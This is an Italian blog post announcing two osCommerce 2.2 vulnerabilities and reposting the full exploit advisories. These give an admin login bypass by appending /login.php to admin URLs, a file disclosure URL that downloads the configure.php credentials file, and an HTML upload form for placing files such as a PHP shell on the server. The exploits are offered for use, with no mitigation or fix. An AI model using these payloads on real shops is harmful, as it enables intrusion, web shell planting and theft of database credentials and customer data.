OScommerce, due exploit affliggono l’ultima relase 2.2!

Due sono gli exploit scoperti a poche ore dell’ultima versione di OScommerce, probabilmente il più noto CMS dedicato al mondo dell’ecomerce e completamente Opern Surce!

Entrambi gli exploit affliggono l’ultima relase 2.2 e permetterebbero l’accesso a file della board con la possibilità di scrittura e la possibilità di visualizzare il pannello di Admin senza credenziali.

Dopo il salto, come di consueto, troverete gli exploi…

Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass

Author : Flyff666
Date : May, 30, 2010
Location : Tangerang, Indonesia
Time Zone : GMT +7:00
Software : OsCommerce Online Merchant v2.2
Tested on : All OS
--------------------------------------------
Email : [email protected]
gReets : Mywisdom(abang.. wkkwkwk), Kiddies, Chaer, Petimati, c4uR
WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be
Spykit, BobyHikaru, Fribo. all member.
Site : Http://www.Devilzc0de.org/forum/
Forum : Http://Indonesianhacker.or.id/
--------------------------------------------

# ByPass Page Admin :

You can use this Trick if admin folder not protected by .htaccess

if you Want to explore admin page without login. You can use /login.php behind the name of the file

Example :

http://[site]/admin/backup.php/login.php

or

http://[site]/admin/file_manager.php/login.php

Demo :

http://server/store/admin/file_manager.php/login.php

You can See all file in Directory Oscommerce.. haha

and you can download all file with tRick above

# File Disclosure :

in : admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Oscommerce Online Merchant v2.2 – Remote File Upload


______                _       _   _
 | ___ \              | |     | | (_)
 | |_/ /_____   _____ | |_   _| |_ _  ___  _ __
 |    // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \
 | |\ \  __/\ V / (_) | | |_| | |_| | (_) | | | |
 \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_|

 _____                      _____  _____
 |_   _|                    |  _  ||  _  |
 | | ___  __ _ _ __ ___   | |/' || |_| |
 | |/ _ \/ _` | '_ ` _ \  |  /| |\____ |
 | |  __/ (_| | | | | | | \ |_/ /.___/ /
 \_/\___|\__,_|_| |_| |_|  \___/ \____/

 DEFACEMENT it's for script kiddies...
_____________________________________________________________

[$] Exploit Title     : Oscommerce Online Merchant v2.2 - Remote File Upload
[$] Date              : 30-05-2010
[$] Author            : MasterGipy
[$] Email             : mastergipy [at] gmail.com
[$] Bug               : Remote File Upload
[$] Vendor            : http://www.oscommerce.com
[$] Google Dork       : n/a

[%] vulnerable file: /admin/file_manager.php

[REMOTE FILE UPLOAD VULNERABILITY]

[$] Exploit:

<html><head><title>Oscommerce Online Merchant v2.2 - Remote File Upload </title></head>
<br><br><u>UPLOAD FILE:</u><br>
<form name="file" action="http://<--  CHANGE HERE   -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">
<input type="file" name="file_1"><br>
<input name="submit" type="submit" value="   Upload   " >
</form>

<br><u>CREATE FILE:</u><br>
<form name="new_file" action="http://<--  CHANGE HERE   -->/admin/file_manager.php/login.php?action=save" method="post">
FILE NAME:<br>
<input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
<input name="submit" type="submit" value="   Save   " >
</form>
</html>

[=] Thanks to  Flyff666 for the original exploit:
 - Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass

[§] Greetings from PORTUGAL ^^